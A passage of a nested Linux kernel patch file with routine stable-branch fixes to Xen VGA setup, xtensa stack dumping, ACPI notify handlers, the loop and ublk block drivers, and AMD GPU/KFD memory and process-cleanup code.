++	if (xen_initial_domain()) {
++		struct xen_platform_op op = {
++			.cmd = XENPF_get_dom0_console,
++		};
++		int ret = HYPERVISOR_platform_op(&op);
++
++		if (ret > 0)
++			xen_init_vga(&op.u.dom0_console,
++				     min(ret * sizeof(char),
++					 sizeof(op.u.dom0_console)),
++				     &boot_params->screen_info);
++	}
+ }
+ 
+ void __init mem_map_via_hcall(struct boot_params *boot_params_p)
+diff --git a/arch/x86/xen/vga.c b/arch/x86/xen/vga.c
+index 14ea32e734d59..d97adab8420f4 100644
+--- a/arch/x86/xen/vga.c
++++ b/arch/x86/xen/vga.c
+@@ -9,10 +9,9 @@
+ 
+ #include "xen-ops.h"
+ 
+-void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size)
++void __init xen_init_vga(const struct dom0_vga_console_info *info, size_t size,
++			 struct screen_info *screen_info)
+ {
+-	struct screen_info *screen_info = &boot_params.screen_info;
+-
+ 	/* This is drawn from a dump from vgacon:startup in
+ 	 * standard Linux. */
+ 	screen_info->orig_video_mode = 3;
+diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
+index 9a8bb972193d8..a10903785a338 100644
+--- a/arch/x86/xen/xen-ops.h
++++ b/arch/x86/xen/xen-ops.h
+@@ -108,11 +108,12 @@ static inline void xen_uninit_lock_cpu(int cpu)
+ 
+ struct dom0_vga_console_info;
+ 
+-#ifdef CONFIG_XEN_PV_DOM0
+-void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size);
++#ifdef CONFIG_XEN_DOM0
++void __init xen_init_vga(const struct dom0_vga_console_info *, size_t size,
++			 struct screen_info *);
+ #else
+ static inline void __init xen_init_vga(const struct dom0_vga_console_info *info,
+-				       size_t size)
++				       size_t size, struct screen_info *si)
+ {
+ }
+ #endif
+diff --git a/arch/xtensa/kernel/traps.c b/arch/xtensa/kernel/traps.c
+index 0c25e035ff107..9e9ade20a7ce4 100644
+--- a/arch/xtensa/kernel/traps.c
++++ b/arch/xtensa/kernel/traps.c
+@@ -541,7 +541,7 @@ static size_t kstack_depth_to_print = CONFIG_PRINT_STACK_DEPTH;
+ 
+ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ {
+-	size_t len;
++	size_t len, off = 0;
+ 
+ 	if (!sp)
+ 		sp = stack_pointer(task);
+@@ -550,9 +550,17 @@ void show_stack(struct task_struct *task, unsigned long *sp, const char *loglvl)
+ 		  kstack_depth_to_print * STACK_DUMP_ENTRY_SIZE);
+ 
+ 	printk("%sStack:\n", loglvl);
+-	print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
+-		       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
+-		       sp, len, false);
++	while (off < len) {
++		u8 line[STACK_DUMP_LINE_SIZE];
++		size_t line_len = len - off > STACK_DUMP_LINE_SIZE ?
++			STACK_DUMP_LINE_SIZE : len - off;
++
++		__memcpy(line, (u8 *)sp + off, line_len);
++		print_hex_dump(loglvl, " ", DUMP_PREFIX_NONE,
++			       STACK_DUMP_LINE_SIZE, STACK_DUMP_ENTRY_SIZE,
++			       line, line_len, false);
++		off += STACK_DUMP_LINE_SIZE;
++	}
+ 	show_trace(task, sp, loglvl);
+ }
+ 
+diff --git a/drivers/acpi/bus.c b/drivers/acpi/bus.c
+index d466c81953146..3b6146b1e25cc 100644
+--- a/drivers/acpi/bus.c
++++ b/drivers/acpi/bus.c
+@@ -456,85 +456,67 @@ out_free:
+                              Notification Handling
+    -------------------------------------------------------------------------- */
+ 
+-/*
+- * acpi_bus_notify
+- * ---------------
+- * Callback for all 'system-level' device notifications (values 0x00-0x7F).
++/**
++ * acpi_bus_notify - Global system-level (0x00-0x7F) notifications handler
++ * @handle: Target ACPI object.
++ * @type: Notification type.
++ * @data: Ignored.
++ *
++ * This only handles notifications related to device hotplug.
+  */
+ static void acpi_bus_notify(acpi_handle handle, u32 type, void *data)
+ {
+ 	struct acpi_device *adev;
+-	u32 ost_code = ACPI_OST_SC_NON_SPECIFIC_FAILURE;
+-	bool hotplug_event = false;
+ 
+ 	switch (type) {
+ 	case ACPI_NOTIFY_BUS_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_BUS_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_WAKE:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_WAKE event\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_EJECT_REQUEST:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_EJECT_REQUEST event\n");
+-		hotplug_event = true;
+ 		break;
+ 
+ 	case ACPI_NOTIFY_DEVICE_CHECK_LIGHT:
+ 		acpi_handle_debug(handle, "ACPI_NOTIFY_DEVICE_CHECK_LIGHT event\n");
+ 		/* TBD: Exactly what does 'light' mean? */
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_FREQUENCY_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a frequency mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_BUS_MODE_MISMATCH:
+ 		acpi_handle_err(handle, "Device cannot be configured due "
+ 				"to a bus mode mismatch\n");
+-		break;
++		return;
+ 
+ 	case ACPI_NOTIFY_POWER_FAULT:
+ 		acpi_handle_err(handle, "Device has suffered a power fault\n");
+-		break;
++		return;
+ 
+ 	default:
+ 		acpi_handle_debug(handle, "Unknown event type 0x%x\n", type);
+-		break;
++		return;
+ 	}
+ 
+ 	adev = acpi_get_acpi_dev(handle);
+-	if (!adev)
+-		goto err;
+-
+-	if (adev->dev.driver) {
+-		struct acpi_driver *driver = to_acpi_driver(adev->dev.driver);
+-
+-		if (driver && driver->ops.notify &&
+-		    (driver->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS))
+-			driver->ops.notify(adev, type);
+-	}
+-
+-	if (!hotplug_event) {
+-		acpi_put_acpi_dev(adev);
+-		return;
+-	}
+ 
+-	if (ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
++	if (adev && ACPI_SUCCESS(acpi_hotplug_schedule(adev, type)))
+ 		return;
+ 
+ 	acpi_put_acpi_dev(adev);
+ 
+- err:
+-	acpi_evaluate_ost(handle, type, ost_code, NULL);
++	acpi_evaluate_ost(handle, type, ACPI_OST_SC_NON_SPECIFIC_FAILURE, NULL);
+ }
+ 
+ static void acpi_notify_device(acpi_handle handle, u32 event, void *data)
+@@ -559,42 +541,51 @@ static u32 acpi_device_fixed_event(void *data)
+ 	return ACPI_INTERRUPT_HANDLED;
+ }
+ 
+-static int acpi_device_install_notify_handler(struct acpi_device *device)
++static int acpi_device_install_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+ 	acpi_status status;
+ 
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		status =
+ 		    acpi_install_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						     acpi_device_fixed_event,
+ 						     device);
+-	else
+-		status = acpi_install_notify_handler(device->handle,
+-						     ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		status = acpi_install_notify_handler(device->handle, type,
+ 						     acpi_notify_device,
+ 						     device);
++	}
+ 
+ 	if (ACPI_FAILURE(status))
+ 		return -EINVAL;
+ 	return 0;
+ }
+ 
+-static void acpi_device_remove_notify_handler(struct acpi_device *device)
++static void acpi_device_remove_notify_handler(struct acpi_device *device,
++					      struct acpi_driver *acpi_drv)
+ {
+-	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON)
++	if (device->device_type == ACPI_BUS_TYPE_POWER_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_POWER_BUTTON,
+ 						acpi_device_fixed_event);
+-	else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON)
++	} else if (device->device_type == ACPI_BUS_TYPE_SLEEP_BUTTON) {
+ 		acpi_remove_fixed_event_handler(ACPI_EVENT_SLEEP_BUTTON,
+ 						acpi_device_fixed_event);
+-	else
+-		acpi_remove_notify_handler(device->handle, ACPI_DEVICE_NOTIFY,
++	} else {
++		u32 type = acpi_drv->flags & ACPI_DRIVER_ALL_NOTIFY_EVENTS ?
++				ACPI_ALL_NOTIFY : ACPI_DEVICE_NOTIFY;
++
++		acpi_remove_notify_handler(device->handle, type,
+ 					   acpi_notify_device);
++	}
+ }
+ 
+ /* Handle events targeting \_SB device (at present only graceful shutdown) */
+@@ -1036,7 +1027,7 @@ static int acpi_device_probe(struct device *dev)
+ 		 acpi_drv->name, acpi_dev->pnp.bus_id);
+ 
+ 	if (acpi_drv->ops.notify) {
+-		ret = acpi_device_install_notify_handler(acpi_dev);
++		ret = acpi_device_install_notify_handler(acpi_dev, acpi_drv);
+ 		if (ret) {
+ 			if (acpi_drv->ops.remove)
+ 				acpi_drv->ops.remove(acpi_dev);
+@@ -1059,7 +1050,7 @@ static void acpi_device_remove(struct device *dev)
+ 	struct acpi_driver *acpi_drv = to_acpi_driver(dev->driver);
+ 
+ 	if (acpi_drv->ops.notify)
+-		acpi_device_remove_notify_handler(acpi_dev);
++		acpi_device_remove_notify_handler(acpi_dev, acpi_drv);
+ 
+ 	if (acpi_drv->ops.remove)
+ 		acpi_drv->ops.remove(acpi_dev);
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index 7f0ed845cd6ad..f06b3d3556710 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -714,6 +714,13 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 		DMI_MATCH(DMI_PRODUCT_NAME, "Dell G15 5515"),
+ 		},
+ 	},
++	{
++	 .callback = video_detect_force_native,
++	 .matches = {
++		DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
++		DMI_MATCH(DMI_PRODUCT_NAME, "Vostro 15 3535"),
++		},
++	},
+ 
+ 	/*
+ 	 * Desktops which falsely report a backlight and which our heuristics
+diff --git a/drivers/block/loop.c b/drivers/block/loop.c
+index 793ae876918ce..426d0b42685a0 100644
+--- a/drivers/block/loop.c
++++ b/drivers/block/loop.c
+@@ -1010,9 +1010,6 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	/* This is safe, since we have a reference from open(). */
+ 	__module_get(THIS_MODULE);
+ 
+-	/* suppress uevents while reconfiguring the device */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
+-
+ 	/*
+ 	 * If we don't hold exclusive handle for the device, upgrade to it
+ 	 * here to avoid changing device under exclusive owner.
+@@ -1067,6 +1064,9 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 		}
+ 	}
+ 
++	/* suppress uevents while reconfiguring the device */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 1);
++
+ 	disk_force_media_change(lo->lo_disk, DISK_EVENT_MEDIA_CHANGE);
+ 	set_disk_ro(lo->lo_disk, (lo->lo_flags & LO_FLAGS_READ_ONLY) != 0);
+ 
+@@ -1109,17 +1109,17 @@ static int loop_configure(struct loop_device *lo, fmode_t mode,
+ 	if (partscan)
+ 		clear_bit(GD_SUPPRESS_PART_SCAN, &lo->lo_disk->state);
+ 
++	/* enable and uncork uevent now that we are done */
++	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
++
+ 	loop_global_unlock(lo, is_loop);
+ 	if (partscan)
+ 		loop_reread_partitions(lo);
++
+ 	if (!(mode & FMODE_EXCL))
+ 		bd_abort_claiming(bdev, loop_configure);
+ 
+-	error = 0;
+-done:
+-	/* enable and uncork uevent now that we are done */
+-	dev_set_uevent_suppress(disk_to_dev(lo->lo_disk), 0);
+-	return error;
++	return 0;
+ 
+ out_unlock:
+ 	loop_global_unlock(lo, is_loop);
+@@ -1130,7 +1130,7 @@ out_putf:
+ 	fput(file);
+ 	/* This is safe: open() is still holding a reference. */
+ 	module_put(THIS_MODULE);
+-	goto done;
++	return error;
+ }
+ 
+ static void __loop_clr_fd(struct loop_device *lo, bool release)
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 4aec9be0ab77e..22a790d512842 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -656,7 +656,8 @@ static void __ublk_fail_req(struct ublk_queue *ubq, struct ublk_io *io,
+ 	}
+ }
+ 
+-static void ubq_complete_io_cmd(struct ublk_io *io, int res)
++static void ubq_complete_io_cmd(struct ublk_io *io, int res,
++				unsigned issue_flags)
+ {
+ 	/* mark this cmd owned by ublksrv */
+ 	io->flags |= UBLK_IO_FLAG_OWNED_BY_SRV;
+@@ -668,7 +669,7 @@ static void ubq_complete_io_cmd(struct ublk_io *io, int res)
+ 	io->flags &= ~UBLK_IO_FLAG_ACTIVE;
+ 
+ 	/* tell ublksrv one io request is coming */
+-	io_uring_cmd_done(io->cmd, res, 0);
++	io_uring_cmd_done(io->cmd, res, 0, issue_flags);
+ }
+ 
+ #define UBLK_REQUEUE_DELAY_MS	3
+@@ -685,7 +686,8 @@ static inline void __ublk_abort_rq(struct ublk_queue *ubq,
+ 	mod_delayed_work(system_wq, &ubq->dev->monitor_work, 0);
+ }
+ 
+-static inline void __ublk_rq_task_work(struct request *req)
++static inline void __ublk_rq_task_work(struct request *req,
++				       unsigned issue_flags)
+ {
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
+ 	int tag = req->tag;
+@@ -723,7 +725,7 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			pr_devel("%s: need get data. op %d, qid %d tag %d io_flags %x\n",
+ 					__func__, io->cmd->cmd_op, ubq->q_id,
+ 					req->tag, io->flags);
+-			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA);
++			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA, issue_flags);
+ 			return;
+ 		}
+ 		/*
+@@ -761,17 +763,18 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			mapped_bytes >> 9;
+ 	}
+ 
+-	ubq_complete_io_cmd(io, UBLK_IO_RES_OK);
++	ubq_complete_io_cmd(io, UBLK_IO_RES_OK, issue_flags);
+ }
+ 
+-static inline void ublk_forward_io_cmds(struct ublk_queue *ubq)
++static inline void ublk_forward_io_cmds(struct ublk_queue *ubq,
++					unsigned issue_flags)
+ {
+ 	struct llist_node *io_cmds = llist_del_all(&ubq->io_cmds);
+ 	struct ublk_rq_data *data, *tmp;
+ 
+ 	io_cmds = llist_reverse_order(io_cmds);
+ 	llist_for_each_entry_safe(data, tmp, io_cmds, node)
+-		__ublk_rq_task_work(blk_mq_rq_from_pdu(data));
++		__ublk_rq_task_work(blk_mq_rq_from_pdu(data), issue_flags);
+ }
+ 
+ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+@@ -783,12 +786,12 @@ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+ 		__ublk_abort_rq(ubq, blk_mq_rq_from_pdu(data));
+ }
+ 
+-static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd)
++static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
+ {
+ 	struct ublk_uring_cmd_pdu *pdu = ublk_get_uring_cmd_pdu(cmd);
+ 	struct ublk_queue *ubq = pdu->ubq;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_rq_task_work_fn(struct callback_head *work)
+@@ -797,8 +800,9 @@ static void ublk_rq_task_work_fn(struct callback_head *work)
+ 			struct ublk_rq_data, work);
+ 	struct request *req = blk_mq_rq_from_pdu(data);
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
++	unsigned issue_flags = IO_URING_F_UNLOCKED;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_queue_cmd(struct ublk_queue *ubq, struct request *rq)
+@@ -1052,7 +1056,8 @@ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+ 		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0);
++			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0,
++						IO_URING_F_UNLOCKED);
+ 	}
+ 
+ 	/* all io commands are canceled */
+@@ -1295,7 +1300,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ 
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: complete: cmd op %d, tag %d ret %x io_flags %x\n",
+ 			__func__, cmd_op, tag, ret, io->flags);
+ 	return -EIOCBQUEUED;
+@@ -2053,7 +2058,7 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 		break;
+ 	}
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: cmd done ret %d cmd_op %x, dev id %d qid %d\n",
+ 			__func__, ret, cmd->cmd_op, header->dev_id, header->queue_id);
+ 	return -EIOCBQUEUED;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+index 435d81d6ffd9b..a78e80f9f65cd 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_acpi.c
+@@ -981,7 +981,12 @@ static bool amdgpu_atcs_pci_probe_handle(struct pci_dev *pdev)
+  */
+ bool amdgpu_acpi_should_gpu_reset(struct amdgpu_device *adev)
+ {
+-	if (adev->flags & AMD_IS_APU)
++	if ((adev->flags & AMD_IS_APU) &&
++	    adev->gfx.imu.funcs) /* Not need to do mode2 reset for IMU enabled APUs */
++		return false;
++
++	if ((adev->flags & AMD_IS_APU) &&
++	    amdgpu_acpi_is_s3_active(adev))
+ 		return false;
+ 
+ 	if (amdgpu_sriov_vf(adev))
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index f79b8e964140e..e191d38f3da62 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1298,14 +1298,14 @@ static int kfd_ioctl_map_memory_to_gpu(struct file *filep,
+ 		args->n_success = i+1;
+ 	}
+ 
+-	mutex_unlock(&p->mutex);
+-
+ 	err = amdgpu_amdkfd_gpuvm_sync_memory(dev->adev, (struct kgd_mem *) mem, true);
+ 	if (err) {
+ 		pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 		goto sync_memory_failed;
+ 	}
+ 
++	mutex_unlock(&p->mutex);
++
+ 	/* Flush TLBs after waiting for the page table updates to complete */
+ 	for (i = 0; i < args->n_devices; i++) {
+ 		peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1321,9 +1321,9 @@ get_process_device_data_failed:
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ map_memory_to_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 
+ 	return err;
+@@ -1337,6 +1337,7 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 	void *mem;
+ 	long err = 0;
+ 	uint32_t *devices_arr = NULL, i;
++	bool flush_tlb;
+ 
+ 	if (!args->n_devices) {
+ 		pr_debug("Device IDs array empty\n");
+@@ -1389,16 +1390,19 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ 		}
+ 		args->n_success = i+1;
+ 	}
+-	mutex_unlock(&p->mutex);
+ 
+-	if (kfd_flush_tlb_after_unmap(pdd->dev)) {
++	flush_tlb = kfd_flush_tlb_after_unmap(pdd->dev);
++	if (flush_tlb) {
+ 		err = amdgpu_amdkfd_gpuvm_sync_memory(pdd->dev->adev,
+ 				(struct kgd_mem *) mem, true);
+ 		if (err) {
+ 			pr_debug("Sync memory failed, wait interrupted by user signal\n");
+ 			goto sync_memory_failed;
+ 		}
++	}
++	mutex_unlock(&p->mutex);
+ 
++	if (flush_tlb) {
+ 		/* Flush TLBs after waiting for the page table updates to complete */
+ 		for (i = 0; i < args->n_devices; i++) {
+ 			peer_pdd = kfd_process_device_data_by_id(p, devices_arr[i]);
+@@ -1414,9 +1418,9 @@ static int kfd_ioctl_unmap_memory_from_gpu(struct file *filep,
+ bind_process_to_device_failed:
+ get_mem_obj_from_handle_failed:
+ unmap_memory_from_gpu_failed:
++sync_memory_failed:
+ 	mutex_unlock(&p->mutex);
+ copy_from_user_failed:
+-sync_memory_failed:
+ 	kfree(devices_arr);
+ 	return err;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+index 22b077ac9a196..88bf6221d4bef 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_migrate.c
+@@ -295,7 +295,7 @@ static unsigned long svm_migrate_unsuccessful_pages(struct migrate_vma *migrate)
+ static int
+ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			 struct migrate_vma *migrate, struct dma_fence **mfence,
+-			 dma_addr_t *scratch)
++			 dma_addr_t *scratch, uint64_t ttm_res_offset)
+ {
+ 	uint64_t npages = migrate->npages;
+ 	struct device *dev = adev->dev;
+@@ -305,19 +305,13 @@ svm_migrate_copy_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	uint64_t i, j;
+ 	int r;
+ 
+-	pr_debug("svms 0x%p [0x%lx 0x%lx]\n", prange->svms, prange->start,
+-		 prange->last);
++	pr_debug("svms 0x%p [0x%lx 0x%lx 0x%llx]\n", prange->svms, prange->start,
++		 prange->last, ttm_res_offset);
+ 
+ 	src = scratch;
+ 	dst = (uint64_t *)(scratch + npages);
+ 
+-	r = svm_range_vram_node_new(adev, prange, true);
+-	if (r) {
+-		dev_dbg(adev->dev, "fail %d to alloc vram\n", r);
+-		goto out;
+-	}
+-
+-	amdgpu_res_first(prange->ttm_res, prange->offset << PAGE_SHIFT,
++	amdgpu_res_first(prange->ttm_res, ttm_res_offset,
+ 			 npages << PAGE_SHIFT, &cursor);
+ 	for (i = j = 0; i < npages; i++) {
+ 		struct page *spage;
+@@ -397,14 +391,14 @@ out_free_vram_pages:
+ 		migrate->dst[i + 3] = 0;
+ 	}
+ #endif
+-out:
++
+ 	return r;
+ }
+ 
+ static long
+ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 			struct vm_area_struct *vma, uint64_t start,
+-			uint64_t end, uint32_t trigger)
++			uint64_t end, uint32_t trigger, uint64_t ttm_res_offset)
+ {
+ 	struct kfd_process *p = container_of(prange->svms, struct kfd_process, svms);
+ 	uint64_t npages = (end - start) >> PAGE_SHIFT;
+@@ -457,7 +451,7 @@ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	else
+ 		pr_debug("0x%lx pages migrated\n", cpages);
+ 
+-	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch);
++	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch, ttm_res_offset);
+ 	migrate_vma_pages(&migrate);
+ 
+ 	pr_debug("successful/cpages/npages 0x%lx/0x%lx/0x%lx\n",
+@@ -505,6 +499,7 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	unsigned long addr, start, end;
+ 	struct vm_area_struct *vma;
+ 	struct amdgpu_device *adev;
++	uint64_t ttm_res_offset;
+ 	unsigned long cpages = 0;
+ 	long r = 0;
+ 
+@@ -526,6 +521,13 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	start = prange->start << PAGE_SHIFT;
+ 	end = (prange->last + 1) << PAGE_SHIFT;
+ 
++	r = svm_range_vram_node_new(adev, prange, true);
++	if (r) {
++		dev_dbg(adev->dev, "fail %ld to alloc vram\n", r);
++		return r;
++	}
++	ttm_res_offset = prange->offset << PAGE_SHIFT;
++
+ 	for (addr = start; addr < end;) {
+ 		unsigned long next;
+ 
+@@ -534,18 +536,21 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 			break;
+ 
+ 		next = min(vma->vm_end, end);
+-		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger);
++		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger, ttm_res_offset);
+ 		if (r < 0) {
+ 			pr_debug("failed %ld to migrate\n", r);
+ 			break;
+ 		} else {
+ 			cpages += r;
+ 		}
++		ttm_res_offset += next - addr;
+ 		addr = next;
+ 	}
+ 
+ 	if (cpages)
+ 		prange->actual_loc = best_loc;
++	else
++		svm_range_vram_node_free(prange);
+ 
+ 	return r < 0 ? r : 0;
+ }
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_module.c b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+index 09b966dc37681..aee2212e52f69 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_module.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+@@ -77,6 +77,7 @@ err_ioctl:
+ 
+ static void kfd_exit(void)
+ {
++	kfd_cleanup_processes();
+ 	kfd_debugfs_fini();
+ 	kfd_process_destroy_wq();
+ 	kfd_procfs_shutdown();
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index bf610e3b683bb..6d6588b9beed7 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -928,6 +928,7 @@ bool kfd_dev_is_large_bar(struct kfd_dev *dev);
+ 
+ int kfd_process_create_wq(void);
+ void kfd_process_destroy_wq(void);
++void kfd_cleanup_processes(void);
+ struct kfd_process *kfd_create_process(struct file *filep);
+ struct kfd_process *kfd_get_process(const struct task_struct *task);
+ struct kfd_process *kfd_lookup_process_by_pasid(u32 pasid);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index dd351105c1bcf..7f68d51541e8e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -1167,6 +1167,17 @@ static void kfd_process_free_notifier(struct mmu_notifier *mn)
+ 	kfd_unref_process(container_of(mn, struct kfd_process, mmu_notifier));
+ }
+ 
++static void kfd_process_notifier_release_internal(struct kfd_process *p)
++{
++	cancel_delayed_work_sync(&p->eviction_work);
++	cancel_delayed_work_sync(&p->restore_work);
++
++	/* Indicate to other users that MM is no longer valid */
++	p->mm = NULL;
++
++	mmu_notifier_put(&p->mmu_notifier);
++}
++
+ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 					struct mm_struct *mm)
+ {
+@@ -1181,17 +1192,22 @@ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 		return;
+ 
+ 	mutex_lock(&kfd_processes_mutex);
++	/*
++	 * Do early return if table is empty.
++	 *
++	 * This could potentially happen if this function is called concurrently
++	 * by mmu_notifier and by kfd_cleanup_pocesses.
++	 *
++	 */
++	if (hash_empty(kfd_processes_table)) {
++		mutex_unlock(&kfd_processes_mutex);
++		return;
++	}
+ 	hash_del_rcu(&p->kfd_processes);
+ 	mutex_unlock(&kfd_processes_mutex);
+ 	synchronize_srcu(&kfd_processes_srcu);
+ 
+-	cancel_delayed_work_sync(&p->eviction_work);
+-	cancel_delayed_work_sync(&p->restore_work);
+-
+-	/* Indicate to other users that MM is no longer valid */
+-	p->mm = NULL;
+-
+-	mmu_notifier_put(&p->mmu_notifier);
++	kfd_process_notifier_release_internal(p);
+ }
+ 
+ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+@@ -1200,6 +1216,43 @@ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+ 	.free_notifier = kfd_process_free_notifier,
+ };
+ 
++/*
++ * This code handles the case when driver is being unloaded before all
++ * mm_struct are released.  We need to safely free the kfd_process and
++ * avoid race conditions with mmu_notifier that might try to free them.
++ *
++ */
++void kfd_cleanup_processes(void)
++{
++	struct kfd_process *p;
++	struct hlist_node *p_temp;
++	unsigned int temp;
++	HLIST_HEAD(cleanup_list);
++
++	/*
++	 * Move all remaining kfd_process from the process table to a
++	 * temp list for processing.   Once done, callback from mmu_notifier
++	 * release will not see the kfd_process in the table and do early return,
